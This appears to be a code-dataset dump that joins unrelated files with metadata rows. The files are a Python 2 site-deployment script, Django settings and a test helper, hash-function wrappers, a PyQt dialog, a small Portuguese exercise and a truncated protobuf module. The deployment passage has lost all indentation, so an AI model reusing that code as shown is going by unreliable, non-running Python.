def _checkLibraries(namespace):
logging.info('Finding dependent libraries and headers')
extraLibdirs = namespace.libdir
if extraLibdirs is None:
extraLibdirs = []
for lib, func in (
('xml2', 'xmlNewEntity'),
('xslt', 'xsltInit'),
):
logging.info('Checking for %s', lib)
_checkLibrary(lib, func, extraLibdirs)
# If we get here, then _checkLibrary didn't raise any exception and we found our symbols.
# Note: we should also check versions.
return extraLibdirs
def _getUserID():
logging.info(u'Getting user ID')
username = pwd.getpwuid(os.getuid())[0]
logname = os.environ['LOGNAME']
if logname != username:
logging.warning("LOGNAME \"%s\" does not match current user ID's account name \"%s\", preferring latter",
logname, username)
return username
def _installVirtualEnv(python):
logging.info(u'Installing virtualenv %s', _virtualEnvVersion)
sentinel = os.path.join(u'virtualenv-{}'.format(_virtualEnvVersion),u'virtualenv_support',u'__init__.py')
if not os.path.isfile(sentinel):
logging.debug(u'Downloading from %s', _virtualEnvURL)
with _download(_virtualEnvURL) as f:
tf = tarfile.open(fileobj=f, mode='r:gz')
tf.extractall()
else:
logging.debug(u'Found virtualenv already')
sentinel = os.path.join(u'python2.7', 'bin', 'activate.csh')
if not os.path.isfile(sentinel):
logging.debug(u'Installing virtualenv for python2.7')
ve = os.path.join(u'virtualenv-{}'.format(_virtualEnvVersion), u'virtualenv.py')
subprocess.check_call([python, ve, u'python2.7'])
else:
logging.debug(u'Found virtualenv python already')
# Check for upgraded setuptools?
def _checkCWD():
logging.info(u"Checking what directory we're in")
for name, test in (
('bootstrap.py', os.path.isfile),
('etc', os.path.isdir),
('ops.cfg', os.path.isfile),
('static', os.path.isdir),
('templates', os.path.isdir)
):
if not test(name):
raise DeploymentError(u"File/dir \"{}\" missing; are you running from the right directory?".format(name))
def _download(url):
tf = tempfile.TemporaryFile()
with contextlib.closing(urllib2.urlopen(url)) as con:
while True:
buf = con.read(_bufsiz)
if len(buf) == 0:
break
tf.write(buf)
tf.flush()
tf.seek(0)
return tf
def _installSiteConfig(
executables, extraPaths, libdirs, superUser, superPassword, tomcatUser, tomcatPassword,
zopeUser, zopePassword, hostname, http, https, userID, buildoutCache
):
logging.info(u'Creating site.cfg')
javaHome = os.path.dirname(os.path.dirname(executables['java']))
with open(u'site.cfg', 'w') as f:
f.write(u'[buildout]\n')
f.write(u'extends = ops.cfg\n')
for directive, directory in (
(u'download-cache', u'downloads'),
(u'eggs-directory', u'eggs'),
(u'extends-cache', u'extends')
):
directory = os.path.abspath(os.path.join(buildoutCache, directory))
f.write(u'{} = {}\n'.format(directive, directory))
f.write(u'[hosts]\n')
f.write(u'public-address = {}\n'.format(hostname))
f.write(u'[ports]\n')
f.write(u'nginx = {}\n'.format(http))
f.write(u'nginx-ssl = {}\n'.format(https))
f.write(u'[supervisor]\n')
f.write(u'username = {}\n'.format(superUser))
f.write(u'password = {}\n'.format(superPassword))
f.write(u'[tomcat]\n')
f.write(u'username = {}\n'.format(tomcatUser))
f.write(u'password = {}\n'.format(tomcatPassword))
f.write(u'[zope]\n')
f.write(u'username = {}\n'.format(zopeUser))
f.write(u'password = {}\n'.format(zopePassword))
f.write(u'[paths]\n')
f.write(u'java = {}\n'.format(executables['java']))
f.write(u'java_home = {}\n'.format(javaHome))
f.write(u'nginx = {}\n'.format(executables['nginx']))
f.write(u'varnishd = {}\n'.format(executables['varnishd']))
f.write(u'extra = {}\n'.format(u':'.join(extraPaths)))
if len(libdirs):
f.write(u'libs = {}\n'.format(u':'.join(libdirs)))
f.write(u'[users]\n')
for i in (u'nginx', u'tomcat', u'varnish', u'zeo', u'zope'):
f.write(u'{} = {}\n'.format(i, userID))
def _checkBuildoutCache(directory):
logging.info(u'Checking buildout cache')
def reportError(error):
raise DeploymentError(u'Cannot access "{}" (errno: {})'.format(error.filename, error.strerror))
logging.debug(u'Traversing all files/dirs under %s for writeability', directory)
for root, dirs, files in os.walk(directory, onerror=reportError):
for d in dirs:
d = os.path.abspath(os.path.join(root, d))
if not os.access(d, os.R_OK | os.X_OK | os.W_OK):
raise DeploymentError(u'Cannot read, write, and traverse "{}"'.format(d))
for f in files:
f = os.path.abspath(os.path.join(root, f))
if not os.access(f, os.R_OK | os.W_OK):
raise DeploymentError(u'Cannot read and write "{}"'.format(f))
for d in ('eggs', 'downloads', 'extends'):
d = os.path.abspath(os.path.join(directory, d))
logging.debug(u'Checking if %s is a directory', d)
if not os.path.isdir(d):
logging.debug(u'Creating %s', d)
os.makedirs(d)
def _getCredentials(kind, options):
username = getattr(options, u'{}_user'.format(kind))
passwd = getattr(options, u'{}_password'.format(kind), None)
if passwd is None:
chars = string.letters + string.digits
passwd = ''.join([random.choice(chars) for i in range(20)])
return username, passwd
def _execAndLog(args):
logging.debug(u'>>> %r', args)
sub = subprocess.Popen(args, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
close_fds=True, universal_newlines=True)
output, error = sub.communicate()
sub.wait()
for line in output.split('\n'):
logging.debug(u'... %s', line)
if sub.returncode != 0:
raise DeploymentError(u'Subprocess call failed with return code {} (command was {})'.format(sub.returncode,
repr(args)))
def _bootstrap():
logging.info(u'Bootstrapping the buildout')
args = [
os.path.join(u'python2.7', u'bin', u'python2.7'),
u'bootstrap.py',
u'--buildout-version={}'.format(_buildoutVersion),
u'--setuptools-version={}'.format(_setupToolsVersion),
'-c',
u'site.cfg'
]
_execAndLog(args)
def _buildout():
logging.info(u'Building out; this can take a long time')
args = [os.path.join(u'bin', u'buildout'), u'-c', u'site.cfg']
_execAndLog(args)
def _checkSite(directory):
logging.info(u'Checking old IPDA site at "%s"', directory)
var = os.path.abspath(os.path.join(directory, u'var'))
database = os.path.join(var, u'filestorage', u'Data.fs')
logging.debug(u'Testing if database file %s exists', database)
if not os.path.isfile(database):
raise DeploymentError(u'Existing site at "{}" lacks a database at "{}"'.format(directory, database))
blobs = os.path.join(var, u'blobstorage')
logging.debug(u'Testing if blob directory %s exists', blobs)
if not os.path.isdir(blobs):
raise DeploymentError(u'Existing site at "{}" lacks blobstorage at "{}"'.format(directory, blobs))
def _copyContent(directory):
logging.info(u'Copying content from existing IPDA site at "%s"', directory)
var = os.path.abspath(os.path.join(directory, u'var'))
database = os.path.join(var, u'filestorage', u'Data.fs')
targetDir = os.path.abspath(os.path.join(u'var', u'filestorage'))
if not os.path.isdir(targetDir):
logging.debug(u'Creating directory %s', directory)
os.makedirs(targetDir)
logging.debug(u'Copying %s to %s', database, targetDir)
shutil.copy(database, targetDir)
blobs = os.path.join(var, u'blobstorage')
targetDir = os.path.abspath(os.path.join(u'var', u'blobstorage'))
if os.path.isdir(targetDir):
logging.debug(u'Removing directory %s', targetDir)
shutil.rmtree(targetDir)
logging.debug(u'Copying tree %s to var', blobs)
shutil.copytree(blobs, os.path.abspath(u'var/blobstorage'))
registryDir = os.path.abspath(os.path.join(u'var', u'registry'))
if os.path.isdir(registryDir):
logging.debug(u'Removing barebones registry db at %s', registryDir)
shutil.rmtree(registryDir)
registryDB = os.path.join(var, u'registry')
logging.debug(u'Copying tree %s to var', registryDB)
shutil.copytree(registryDB, os.path.abspath(u'var/registry'))
def _deployEmptySite():
logging.info(u'Deploying IPDA website with minimal content')
args = [os.path.join(u'bin', u'buildout'), u'-c', u'site.cfg', 'install', 'basic-site']
_execAndLog(args)
def _upgradeSite(user, password):
logging.info(u'Setting up new Zope user and upgrading site')
args = [os.path.join(u'bin', u'zope-debug'), u'run', os.path.join(u'support', u'upgrade.py'), user, password]
_execAndLog(args)
def main(argv):
_setupLogging()
_checkCWD()
parser = _getArgParser()
ns = parser.parse_args(argv[1:])
if ns.existing:
_checkSite(ns.existing)
executables = _findExecutables(ns)
_checkVarnish(executables['varnishd'])
libdirs = _checkLibraries(ns)
extraPaths = set()
for path in (executables['lynx'], executables['pdftohtml'], executables['wvHtml']):
directory = os.path.dirname(path)
extraPaths.add(directory)
logging.debug(u'Extra PATH to set: %s', extraPaths)
userID = _getUserID()
logging.info(u'Processes will run with user ID "%s"', userID)
_checkBuildoutCache(ns.buildout_cache)
_installVirtualEnv(executables['python'])
superUser, superPassword = _getCredentials(u'supervisor', ns)
tomcatUser, tomcatPassword = _getCredentials(u'tomcat', ns)
zopeUser, zopePassword = _getCredentials(u'zope', ns)
_installSiteConfig(executables, extraPaths, libdirs, superUser, superPassword, tomcatUser, tomcatPassword,
zopeUser, zopePassword, ns.public_hostname, ns.http_port, ns.https_port, userID, ns.buildout_cache)
_bootstrap()
_buildout()
if ns.existing:
_copyContent(ns.existing)
_upgradeSite(zopeUser, zopePassword)
else:
_deployEmptySite()
return True
if __name__ == '__main__':
sys.exit(0 if main(sys.argv) else -1)
| 46.141732 | 121 | 0.659158 | 2,380 | 17,580 | 4.810084 | 0.203782 | 0.027778 | 0.015898 | 0.018169 | 0.276555 | 0.221611 | 0.189465 | 0.121681 | 0.103337 | 0.071716 | 0 | 0.003861 | 0.189647 | 17,580 | 380 | 122 | 46.263158 | 0.799733 | 0.020193 | 0 | 0.064706 | 0 | 0.005882 | 0.288046 | 0.007783 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.064706 | 0.005882 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7eb546f1428e9e46c412c95c4b290bb93627a3b7 | 713 | py | Python | global_id/tests/utils/callers/guid_caller.py | ThePokerFaCcCe/messenger | 2db3d5c2ccd05ac40d2442a13d664ca9ad3cb14c | [
"MIT"
] | null | null | null | global_id/tests/utils/callers/guid_caller.py | ThePokerFaCcCe/messenger | 2db3d5c2ccd05ac40d2442a13d664ca9ad3cb14c | [
"MIT"
] | null | null | null | global_id/tests/utils/callers/guid_caller.py | ThePokerFaCcCe/messenger | 2db3d5c2ccd05ac40d2442a13d664ca9ad3cb14c | [
"MIT"
] | null | null | null | from django.urls.base import reverse
from rest_framework import status
from global_id.urls import app_name
from core.tests.utils import BaseCaller
from ..creators import create_guid
def guid_detail_url(guid=None):
return reverse(f"{app_name}:guid-detail",
kwargs={'guid': guid or create_guid().guid})
class GUIDViewCaller(BaseCaller):
def retrieve__get(self, access_token, guid: str = None,
allowed_status=status.HTTP_200_OK):
"""Calls guid-detail view with GET method"""
return self.assert_status_code(
allowed_status, self.client.get,
guid_detail_url(guid),
**self.get_auth_header(access_token)
)
| 31 | 63 | 0.678822 | 94 | 713 | 4.914894 | 0.521277 | 0.08658 | 0.056277 | 0.073593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005474 | 0.231417 | 713 | 22 | 64 | 32.409091 | 0.837591 | 0.053296 | 0 | 0 | 0 | 0 | 0.038864 | 0.032885 | 0 | 0 | 0 | 0 | 0.0625 | 1 | 0.125 | false | 0 | 0.3125 | 0.0625 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0e22d4557755570980a88c3dd6efa6cf9f1ddd9e | 3,600 | py | Python | backend/config/settings/base.py | r0tii/process-status-viewer | 6c94a7a6f5e37f37f63d6140c806a0b6fc49ae1c | [
"MIT"
] | null | null | null | backend/config/settings/base.py | r0tii/process-status-viewer | 6c94a7a6f5e37f37f63d6140c806a0b6fc49ae1c | [
"MIT"
] | null | null | null | backend/config/settings/base.py | r0tii/process-status-viewer | 6c94a7a6f5e37f37f63d6140c806a0b6fc49ae1c | [
"MIT"
] | null | null | null | """
Base settings to build other settings files upon.
"""
from pathlib import Path
import environ
env = environ.Env()
# GENERAL
# -------------------------------------------------------------------------
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent.parent
PROJECT_NAME = "process_status_monitoring"
APPS_DIR = BASE_DIR / PROJECT_NAME
SECRET_KEY = env("SECRET_KEY")
DEBUG = env("DEBUG")
# APPS
# ------------------------------------------------------------------------------
INSTALLED_APPS = [
# django
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
# third-party
"rest_framework",
"corsheaders",
# Local
"process_status_monitoring.processes.apps.ProcessesConfig",
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"corsheaders.middleware.CorsMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
# DATABASES
# ------------------------------------------------------------------------------
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
# PROJECT CONFIG
# ------------------------------------------------------------------------------
ROOT_URLCONF = "config.urls"
WSGI_APPLICATION = "config.wsgi.application"
APPEND_SLASH = False
# REST FRAMEWORK
# ------------------------------------------------------------------------------
REST_FRAMEWORK = {
"DEFAULT_RENDERER_CLASSES": [
"rest_framework.renderers.JSONRenderer",
],
"DEFAULT_PARSER_CLASSES": [
"rest_framework.parsers.JSONParser",
],
}
# PASSWORD VALIDATION
# ------------------------------------------------------------------------------
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator", # noqa
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# INTERNATIONALIZATION / LOCALIZATION
# ------------------------------------------------------------------------------
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# STATIC FILES (CSS, JAVASCRIPT, IMAGES)
# ------------------------------------------------------------------------------
STATIC_URL = "/static/"
STATIC_ROOT = BASE_DIR / "staticfiles"
MEDIA_URL = "/media/"
MEDIA_ROOT = BASE_DIR / "media"
# TEMPLATES
# ------------------------------------------------------------------------------
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
| 30.252101 | 99 | 0.536667 | 267 | 3,600 | 7.041199 | 0.449438 | 0.103723 | 0.063298 | 0.044681 | 0.082979 | 0.082979 | 0 | 0 | 0 | 0 | 0 | 0.001308 | 0.150278 | 3,600 | 118 | 100 | 30.508475 | 0.613272 | 0.287222 | 0 | 0.037975 | 0 | 0 | 0.551479 | 0.476923 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.063291 | 0.025316 | 0 | 0.025316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0e2735db31e23d6ef2afd7530322a682fcd103d9 | 2,703 | py | Python | hyperloglog/hashfunctions.py | mlkra/various-algorithms | 9cb2d21fe9ec0613c88e70f70e0ff1d471e43079 | [
"MIT"
] | 2 | 2021-12-04T16:12:03.000Z | 2021-12-25T06:57:27.000Z | mincount/hashfunctions.py | mlkra/various-algorithms | 9cb2d21fe9ec0613c88e70f70e0ff1d471e43079 | [
"MIT"
] | null | null | null | mincount/hashfunctions.py | mlkra/various-algorithms | 9cb2d21fe9ec0613c88e70f70e0ff1d471e43079 | [
"MIT"
] | null | null | null | from typing import Callable
import hashlib
import zlib
def __common(n: int, h: Callable, digest_size: int, b=0) -> float:
assert b <= digest_size
if b == 0:
return int.from_bytes(h(n.to_bytes(8, "big")).digest(), 'big') / 2**digest_size
else:
return (int.from_bytes(h(n.to_bytes(8, "big")).digest(), 'big') >> (digest_size - b)) / 2**b
def md5(n: int, b=0) -> float:
return __common(n, hashlib.md5, 128, b)
def sha1(n: int, b=0) -> float:
return __common(n, hashlib.sha1, 160, b)
def sha12(n: int) -> int:
return int(hashlib.sha1(n.to_bytes(8, "big")).hexdigest()[:8], 16)
def sha224(n: int, b=0) -> float:
return __common(n, hashlib.sha224, 224, b)
def sha256(n: int, b=0) -> float:
return __common(n, hashlib.sha256, 256, b)
def sha384(n: int, b=0) -> float:
return __common(n, hashlib.sha384, 384, b)
def sha512(n: int, b=0) -> float:
return __common(n, hashlib.sha512, 512, b)
def blake2b(n: int, b=0) -> float:
return __common(n, hashlib.blake2b, 512, b)
def blake2s(n: int, b=0) -> float:
return __common(n, hashlib.blake2s, 256, b) #pylint: disable=no-member
def blake2s2(n: int) -> int:
return int(hashlib.blake2s(n.to_bytes(8, "big")).hexdigest()[:8], 16) #pylint: disable=no-member
def sha3_224(n: int, b=0) -> float:
return __common(n, hashlib.sha3_224, 224, b)
def sha3_256(n: int, b=0) -> float:
return __common(n, hashlib.sha3_256, 256, b)
def sha3_384(n: int, b=0) -> float:
return __common(n, hashlib.sha3_384, 384, b)
def sha3_512(n: int, b=0) -> float:
return __common(n, hashlib.sha3_512, 512, b)
def adler32(n: int, b=0) -> float:
if b == 0:
return zlib.adler32(n.to_bytes(8, "big")) / 2**32
else:
return (zlib.adler32(n.to_bytes(8, "big")) >> (32 - b)) / 2**b
def adler322(n: int) -> int:
return zlib.adler32(n.to_bytes(8, "big"))
def crc32(n: int, b=0) -> float:
if b == 0:
return zlib.crc32(n.to_bytes(8, "big")) / 2**32
else:
return (zlib.crc32(n.to_bytes(8, "big")) >> (32 - b)) / 2**b
def crc322(n: int) -> int:
return zlib.crc32(n.to_bytes(8, "big"))
hash_functions = {
"md5": md5,
"sha1": sha1,
"sha224": sha224,
"sha256": sha256,
"sha384": sha384,
"sha512": sha512,
"blake2b": blake2b,
"blake2s": blake2s,
"sha3_224": sha3_224,
"sha3_256": sha3_256,
"sha3_384": sha3_384,
"sha3_512": sha3_512,
"adler32": adler32,
"crc32": crc32
}
def main():
for name, h in hash_functions.items():
a = [h(n, 16) for n in range(10000)]
print(name)
print(min(a))
print(max(a))
if __name__ == "__main__":
main()
| 22.525 | 101 | 0.594895 | 438 | 2,703 | 3.515982 | 0.150685 | 0.049351 | 0.048701 | 0.097403 | 0.553247 | 0.512987 | 0.483117 | 0.483117 | 0.4 | 0.238961 | 0 | 0.121198 | 0.221606 | 2,703 | 119 | 102 | 22.714286 | 0.610741 | 0.018498 | 0 | 0.08 | 0 | 0 | 0.05017 | 0 | 0 | 0 | 0 | 0 | 0.013333 | 1 | 0.266667 | false | 0 | 0.04 | 0.213333 | 0.6 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
0e2afcb852554bb61271877076847899b292fc37 | 4,128 | py | Python | App/components/combEntrada.py | Alexfm101/automata | a39760a04d384ef96ce49cac2517d7248380bd72 | [
"MIT"
] | null | null | null | App/components/combEntrada.py | Alexfm101/automata | a39760a04d384ef96ce49cac2517d7248380bd72 | [
"MIT"
] | null | null | null | App/components/combEntrada.py | Alexfm101/automata | a39760a04d384ef96ce49cac2517d7248380bd72 | [
"MIT"
] | null | null | null | import sys
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
data_edoSiguiente = [[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4]]
data_entrada = [[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4]]
data_edoActual = [[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4]]
class combEntrada(QDialog):
def __init__(self):
super(combEntrada ,self).__init__()
layout = QGridLayout()
self.setLayout(layout)
self.data_edoSiguiente = data_edoSiguiente
self.data_edoActual = data_edoActual
self.data_entrada = data_entrada
#tabla
entrada = QTableWidget(16, 4)
salida = QTableWidget(16, 4)
estado = QTableWidget(16, 4)
newitem = QTableWidgetItem()
label_entrada = QLabel()
label_entrada.setText("tabla de entradas")
label_salida = QLabel()
label_salida.setText("Estado siguiente")
label_edo = QLabel()
label_edo.setText("estado actual")
#boton
ok = QPushButton('ok')
ok2 = QPushButton('ok2')
ok3 = QPushButton('ok3')
def _matrix():
for i in range(0, 16):
for j in range(0, 4):
newitem = entrada.item(i, j)
if (newitem == None):
a = "x"
pass
elif (not newitem.text() == "1" and not newitem.text() == "0"):
a = "x"
pass
else:
a = newitem.text()
pass
data_entrada[i][j] = a
def _matrix2():
for i in range(0, 16):
for j in range(0, 4):
newitem = salida.item(i, j)
if (newitem == None):
a = "x"
pass
elif (not newitem.text() == "1" and not newitem.text() == "0"):
a = "x"
pass
else:
a = newitem.text()
pass
data_edoSiguiente[i][j] = a
def _matrix3():
for i in range(0, 16):
for j in range(0, 4):
newitem = estado.item(i, j)
if (newitem == None):
a = "x"
pass
elif (not newitem.text() == "1" and not newitem.text() == "0"):
a = "x"
pass
else:
a = newitem.text()
pass
data_edoActual[i][j] = a
def _print():
print(self.data_entrada)
def _print2():
print(self.data_edoSiguiente)
def _print3():
print(self.data_edoActual)
entrada.cellChanged.connect(_matrix)
salida.cellChanged.connect(_matrix2)
estado.cellChanged.connect(_matrix3)
ok.clicked.connect(_print)
ok2.clicked.connect(_print2)
ok3.clicked.connect(_print3)
#mostrar
layout.addWidget(entrada, 1, 0)
layout.addWidget(salida, 1, 1)
layout.addWidget(estado,1,2)
layout.addWidget(ok,2,0)
layout.addWidget(ok2, 2, 1)
layout.addWidget(ok3,2,2)
layout.addWidget(label_entrada, 0, 0)
layout.addWidget(label_salida, 0, 1)
layout.addWidget(label_edo,0,2)
| 33.024 | 83 | 0.428052 | 530 | 4,128 | 3.250943 | 0.141509 | 0.056878 | 0.083575 | 0.111434 | 0.335461 | 0.335461 | 0.335461 | 0.335461 | 0.335461 | 0.335461 | 0 | 0.108052 | 0.419331 | 4,128 | 124 | 84 | 33.290323 | 0.610763 | 0 | 0 | 0.405941 | 0 | 0 | 0.016066 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.089109 | 0.039604 | null | null | 0.089109 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0e49791b45f3761db0f53cd99453bc620539bd37 | 456 | py | Python | Modulo 02/exercicios/d041.py | euyag/python-cursoemvideo | d2f684854d926e38ea193816a6c7d2c48d25aa3d | [
"MIT"
] | 2 | 2021-06-22T00:15:11.000Z | 2021-08-02T11:28:56.000Z | Modulo 02/exercicios/d041.py | euyag/python-cursoemvideo | d2f684854d926e38ea193816a6c7d2c48d25aa3d | [
"MIT"
] | null | null | null | Modulo 02/exercicios/d041.py | euyag/python-cursoemvideo | d2f684854d926e38ea193816a6c7d2c48d25aa3d | [
"MIT"
] | null | null | null | print('===== DESAFIO 041 =====')
nascimento = int(input('Digite o ano q vc nasceu: '))
idade = 2021 - nascimento
print(f'vc tem {idade} anos')
if idade <= 9:
print('vc é um nadador mirim')
elif idade > 9 and idade <= 14:
print('vc é um nadador infantil')
elif idade > 14 and idade <= 19:
print('vc é um nadador junior')
elif idade > 19 and idade <= 20:
print('vc é um nadador senior')
elif idade > 20:
print('vc é um nadador master') | 26.823529 | 53 | 0.631579 | 75 | 456 | 3.84 | 0.426667 | 0.121528 | 0.138889 | 0.173611 | 0.34375 | 0.166667 | 0.166667 | 0 | 0 | 0 | 0 | 0.059155 | 0.221491 | 456 | 17 | 54 | 26.823529 | 0.752113 | 0 | 0 | 0 | 0 | 0 | 0.391685 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
0e4f69138aecd1313f122259efebb214ee565651 | 19,502 | py | Python | venv/Lib/site-packages/tensorboard/uploader/proto/server_info_pb2.py | masterrey/SmartMachines | e48aff314b1171a13a39c3a41230d900bf090a1f | [
"Apache-2.0"
] | 353 | 2020-12-10T10:47:17.000Z | 2022-03-31T23:08:29.000Z | venv/Lib/site-packages/tensorboard/uploader/proto/server_info_pb2.py | masterrey/SmartMachines | e48aff314b1171a13a39c3a41230d900bf090a1f | [
"Apache-2.0"
] | 80 | 2020-12-10T09:54:22.000Z | 2022-03-30T22:08:45.000Z | venv/Lib/site-packages/tensorboard/uploader/proto/server_info_pb2.py | masterrey/SmartMachines | e48aff314b1171a13a39c3a41230d900bf090a1f | [
"Apache-2.0"
] | 63 | 2020-12-10T17:10:34.000Z | 2022-03-28T16:27:07.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorboard/uploader/proto/server_info.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorboard/uploader/proto/server_info.proto',
package='tensorboard.service',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n,tensorboard/uploader/proto/server_info.proto\x12\x13tensorboard.service\"l\n\x11ServerInfoRequest\x12\x0f\n\x07version\x18\x01 \x01(\t\x12\x46\n\x14plugin_specification\x18\x02 \x01(\x0b\x32(.tensorboard.service.PluginSpecification\"\xb7\x02\n\x12ServerInfoResponse\x12\x39\n\rcompatibility\x18\x01 \x01(\x0b\x32\".tensorboard.service.Compatibility\x12\x32\n\napi_server\x18\x02 \x01(\x0b\x32\x1e.tensorboard.service.ApiServer\x12<\n\nurl_format\x18\x03 \x01(\x0b\x32(.tensorboard.service.ExperimentUrlFormat\x12:\n\x0eplugin_control\x18\x04 \x01(\x0b\x32\".tensorboard.service.PluginControl\x12\x38\n\rupload_limits\x18\x05 \x01(\x0b\x32!.tensorboard.service.UploadLimits\"\\\n\rCompatibility\x12:\n\x07verdict\x18\x01 \x01(\x0e\x32).tensorboard.service.CompatibilityVerdict\x12\x0f\n\x07\x64\x65tails\x18\x02 \x01(\t\"\x1d\n\tApiServer\x12\x10\n\x08\x65ndpoint\x18\x01 \x01(\t\"?\n\x13\x45xperimentUrlFormat\x12\x10\n\x08template\x18\x01 \x01(\t\x12\x16\n\x0eid_placeholder\x18\x02 \x01(\t\"-\n\x13PluginSpecification\x12\x16\n\x0eupload_plugins\x18\x02 \x03(\t\"(\n\rPluginControl\x12\x17\n\x0f\x61llowed_plugins\x18\x01 \x03(\t\"\x92\x02\n\x0cUploadLimits\x12\x1f\n\x17max_scalar_request_size\x18\x03 \x01(\x03\x12\x1f\n\x17max_tensor_request_size\x18\x04 \x01(\x03\x12\x1d\n\x15max_blob_request_size\x18\x05 \x01(\x03\x12#\n\x1bmin_scalar_request_interval\x18\x06 \x01(\x03\x12#\n\x1bmin_tensor_request_interval\x18\x07 \x01(\x03\x12!\n\x19min_blob_request_interval\x18\x08 \x01(\x03\x12\x15\n\rmax_blob_size\x18\x01 \x01(\x03\x12\x1d\n\x15max_tensor_point_size\x18\x02 \x01(\x03*`\n\x14\x43ompatibilityVerdict\x12\x13\n\x0fVERDICT_UNKNOWN\x10\x00\x12\x0e\n\nVERDICT_OK\x10\x01\x12\x10\n\x0cVERDICT_WARN\x10\x02\x12\x11\n\rVERDICT_ERROR\x10\x03\x62\x06proto3')
)
_COMPATIBILITYVERDICT = _descriptor.EnumDescriptor(
name='CompatibilityVerdict',
full_name='tensorboard.service.CompatibilityVerdict',
filename=None,
file=DESCRIPTOR,
values=[
